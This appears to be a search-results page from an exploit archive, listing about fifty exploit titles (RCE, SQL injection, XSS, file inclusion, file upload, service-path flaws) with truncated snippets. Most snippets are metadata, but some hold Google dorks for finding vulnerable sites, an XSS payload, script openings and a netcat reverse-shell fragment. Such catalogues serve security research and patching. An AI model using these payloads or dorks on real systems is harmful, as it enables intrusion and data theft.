47904 matches found
ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)
!/usr/bin/python3 Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution Authenticated Google Dork: None Date: 2020-09-04 Exploit Author: Hodorsec Vendor Homepage: https://manageengine.co.uk Vendor Vulnerability Description:...
SquirrelMail 1.2.x - From Email Header HTML Injection
source: https://www.securityfocus.com/bid/10450/info SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. An attacker can exploit this issue to...
MiniCMS 1.10 - 'content box' Stored XSS
Exploit Title: MiniCMS 1.10 - 'content box' Stored XSS Date: 2019-7-4 Exploit Author: yudp Vendor Homepage: https://github.com/bg5sbk/MiniCMS Software Link:https://github.com/bg5sbk/MiniCMS Version: 1.10 CVE :CVE-2019-13339 Payload:alert"3: "+document.domain In /MiniCMS/mc-admin/page-edit.php POC...
Google Chrome 86.0.4240 V8 - Remote Code Execution
Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution Exploit Author: r4j0x00 Version: 87.0.4280.88 Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE:...
User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection
Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection Date: 2020–11–14 Exploit Author: Mayur Parmarth3cyb3rc0p Vendor Homepage: https://phpgurukul.com Software Link:...
Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path Author: Jair Amezcua Date: 2020-11-10 Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/es/advancedsystemcarepro.php Version : 13.0.0.157 Tested on: Windows 10 64bitEN CVE : N/A ...
WordPress Plugin SuperForms 4.9 - Arbitrary File Upload
Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution Exploit Author: ABDO10 Date : Jan - 28 - 2021 Google Dork : inurl:"/wp-content/plugins/super-forms/" Vendor Homepage : https://renstillmann.github.io/super-forms// Version : All = 4.9.X data in http...
M/Monit 3.7.4 - Password Disclosure
Title: M/Monit 3.7.4 - Password Disclosure Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting to...
PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion
source: https://www.securityfocus.com/bid/30707/info PHPizabi is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of t...
Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path
Exploit Title: Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path Discovery by: Alan Mondragon Discovery Date: 2021-03-23 Vendor Homepage: https://eventlogxp.com/ Software Links : https://eventlogxp.com/ Tested Version: Version: 4.9.3 Vulnerability Type: Unquoted...
WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting Google Dork: "WonderCMS" Date: 2020-11-27 Exploit Author: SunCSR Sun Cyber Security Research Vendor Homepage: https://www.wondercms.com/ Software Link:...
EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass Date: 17-11-2020 Exploit Author: Kislay Kumar Vendor Homepage: http://egavilanmedia.com Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/ Version:...
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
Exploit Title: Online Voting System 1.0 - SQLi Authentication Bypass + Remote Code Execution RCE Exploit Author: Geiseric Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075 Date 02.07.2021 Vendor Homepage:...
DZCP (deV!L`z Clanportal) Witze Addon 0.9 - SQL Injection
======================================================================================== | Title : deV!Lz Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability | Author : Easy Laster | Download : http://dzcp-zone.de/downloads/?action=show&id=97 | Script : Witze Addon Versions 0.9 | Pric...
Life Insurance Management System 1.0 - File Upload RCE (Authenticated)
Exploit Title: Life Insurance Management System 1.0 - File Upload RCE Authenticated Date: 15/1/2021 Exploit Author: Aitor Herrero Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html...
PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
Exploit Title: PHP 7.3.15-3 - 'PHPSESSIONUPLOADPROGRESS' Session Data Injection Date: 26/7/2021 Exploit Author: SiLvER | Faisal Alhadlaq Tested on: PHP Version is 7.3.15-3 This poc will abusing PHPSESSIONUPLOADPROGRESS then will trigger race condition to get remote code execution, the script will...
ImageMagick 7.1.0-49 - Arbitrary File Read
Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read Google Dork: N/A Date: 06/02/2023 Exploit Author: Cristian 'void' Giustini Vendor Homepage: https://imagemagick.org/ Software Link: https://imagemagick.org/ Version: = 7.1.0-49 Tested on: 7.1.0-49 and 6.9.11-60 CVE : CVE-2022-44268 CVE...
Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting
Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting Date: 3-12-2020 Exploit Author: Parshwa Bhavsar Vendor Homepage: https://compo.sr/ Software Link: https://compo.sr/download.htm Version: 10.0.34 Tested on: Windows 10/ Kali Linux Steps To Reproduce :- 1. Install the CM...
Hrsale 2.0.0 - Local File Inclusion
Exploit Title: Hrsale 2.0.0 - Local File Inclusion Date: 10/21/2020 Exploit Author: Sosecure Vendor Homepage: https://hrsale.com/index.php Version: version 2.0.0 Description: This exploit allow you to download any readable file from server with out permission and login session. Payload :...
Apache mod_session_crypto - Padding Oracle
''' Advisory: Padding Oracle in Apache modsessioncrypto During a penetration test, RedTeam Pentesting discovered a Padding Oracle vulnerability in modsessioncrypto of the Apache web server. This vulnerability can be exploited to decrypt the session data and even encrypt attacker-specified data...
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)
!/usr/bin/python Cisco UCS Manager 2.11b Shellshock Exploit CVE-2014-6278 Confirmed on version 2.11b, but more are likely vulnerable. Cisco's advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash Exploit generates a reverse shell to a nc listener...
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution Google Dork: ext:action | filetype:action Date: 2020/09/09 Exploit Author: Jonatas Fil Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html Version: = 2.3.15 Tested on: Linux CVE : CVE-2013-2251...
Openfire 4.6.0 - 'groupchatJID' Stored XSS
Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS Date: 2020/12/11 Exploit Author: j5s Vendor Homepage: https://github.com/igniterealtime/Openfire Software Link: https://www.igniterealtime.org/downloads/ Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host:...
LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
Exploit Title: Huawei LCDService 1.0.1.0 - 'LCDService' Unquote Service Path Date: 2020-11-07 Exploit Author: Gerardo González Vendor Homepage: https://consumer.huawei.com/mx Software Link: https://consumer.huawei.com/mx Version: 1.0.1.0 Tested on: Windows 10 Home Single Language x64 Esp Step to...
Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path
Exploit Title: Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path Exploit Author: Bobby Cooke Date: 2020-07-15 Vendor Site: https://www.10-strike.com/ Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe Tested On: Windows 10 - Pro 1909 x86...
CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.cszcms.com/ Software Link: https://sourceforge.net/projects/cszcms/ Version: v1.2.7 Description: Unauthorized user that has access private message can embed Javascript...
Telerik UI - Remote Code Execution via Insecure Deserialization
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue along with patching instructions. Install git clone...
WordPress Plugin contact-form-7 5.1.6 - Remote File Upload
Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload Author: mehran feizi Category: webapps Date: 2020-02-11 vendor home page: https://wordpress.org/plugins/contact-form-7/ Vulnerable Source: 134: moveuploadedfile moveuploadedfile$file'tmpname', $newfile 82: $file = $FILES$name : null...
FileThingie 2.5.7 - Arbitrary File Upload
Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload Author: Cakes Discovery Date: 2019-09-03 Vendor Homepage: www.solitude.dk/filethingie Software Link: https://github.com/leefish/filethingie/archive/master.zip Tested Version: 2.5.7 Tested on OS: CentOS 7 CVE: N/A Intro: Easy arbitrary file...
Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection Authenticated Exploit Author: SunCSR Sun Cyber Security Research - Nguyen Khang Google Dork: N/A Date: 2020-08-24 Vendor Homepage: https://accesspressthemes.com Software Link:...
phpMyAdmin 2.6.4-pl1 - Directory Traversal
!/usr/bin/perl use IO::Socket; SecurityReason.com TEAM Maksymilian Arciemowicz cXIb8O3 [email protected] Local file inclusion ./$FILE simple exploit phpMyAdmin 2.6.4-pl1 SecurityReason.com if @ARGV new Proto = "tcp", PeerAddr = "$HOST", PeerPort = "80" || die "Error 404\r\n\r\n"; print $get...
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF Unauthenticated Date: 03/12/2020 Exploit Author: Pankaj Verma p4nk4j Vendor Homepage: https://www.canto.com/integrations/wordpress/ Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin Version: 1.3.0 Tested on: Ubuntu 18.04 CVE...
Android Binder - Use-After-Free (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Android Binder Use-After-Free Exploit", 'Description' = %q , 'License' = MSFLICENSE, 'Author' = 'Jann Horn', discovery and exploit 'Maddie Stone'...
M/Monit 3.7.4 - Privilege Escalation
Title: M/Monit 3.7.4 - Privilege Escalation Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting t...
Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting Date: 04-12-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.formalms.org/download.html Software Link: https://www.formalms.org/ Version: 2.3 Tested on: Windows 10/Kali Linux...
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification Google Dork: intitle:"Please Login" "Use FTM Push" Date: 15/11/2020 Exploit Author: Ricardo Longatto Details: This exploit allow change users password from SSLVPN web portal Vendor Homepage:...
ElasticSearch 7.13.3 - Memory disclosure
Exploit Title: ElasticSearch 7.13.3 - Memory disclosure Date: 21/07/2021 Exploit Author: r0ny Vendor Homepage: https://www.elastic.co/ Software Link: https://github.com/elastic/elasticsearch Version: 7.10.0 to 7.13.3 Tested on: Kali Linux CVE : CVE-2021-22145 /usr/bin/python3 from argparse import...
Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)
Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution Javascript API Exploit Author: Nassim Asrir Vendor Homepage: https://www.foxitsoftware.com/ Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker...
Beauty Parlour Management System 1.0 - Authentication Bypass
Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass Google Dork: N/A Exploit Author: Prof. Kailas PATIL krp Date: 2020-06-18 Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ Version: v1.0...
Online Job Portal 1.0 - 'user_email' SQL Injection
Exploit Title: Online Job Portal 1.0 - 'useremail' SQL Injection Dork: N/A Date: 2020-02-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...
WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download Google Dork: intitle:"Index of" AND "wp-content/plugins/boldgrid-backup/=" Date: 2020-12-12 Exploit Author: Wadeek Vendor Homepage: https://www.boldgrid.com/ Software Link:...
Supply Chain Management System - Auth Bypass SQL Injection
Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection Date: 2020-12-11 Exploit Author: Piyush Malviya Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html Software Link:...
Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution
Exploit Title: Simple College Website 1.0 - SQL Injection / Remote Code Execution Date: 30-10-2020 Exploit Author: yunaranyancat Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html Software Link:...
Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...
WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload
!/usr/bin/python -- coding: utf-8 -- Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload Date: 2020-11-01 Exploit Author: H4rk3nz0 based off exploit by coiffeur Original Exploit: https://www.exploit-db.com/exploits/48349 Vendor Homepage: https://simplefilelist.com/...
phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution RCE Date: 17/08/2021 Exploit Author: samguy Vulnerability Discovery By: ChaMd5 & Henry Huang Vendor Homepage: http://www.phpmyadmin.net Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE481.tar.gz Version: 4.8.1 Tested o...
ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)
Exploit Title: ScadaBR 1.0 - Arbitrary File Upload Authenticated 1 Date: 03/2021 Exploit Author: Fellipe Oliveira Vendor Homepage: https://www.scadabr.com.br/ Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux Tested on: Windows7, Windows10 !/usr/bin/python import requests,sys,time if...
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)
/ CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted...
Openfire 4.6.0 - 'users' Stored XSS
Exploit Title: Openfire 4.6.0 - 'users' Stored XSS Date: 2020/12/11 Exploit Author: j5s Vendor Homepage: https://github.com/igniterealtime/Openfire Software Link: https://www.igniterealtime.org/downloads/ Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host: 192.168.137.137:90...
Citrix XenMobile Server 10.8 - XML External Entity Injection
Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection Google Dork: inurl:zdm logon Date: 2019-11-28 Exploit Author: Jonas Lejon Vendor Homepage: https://www.citrix.com Software Link: Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3 Tested on: XenMobile CVE :...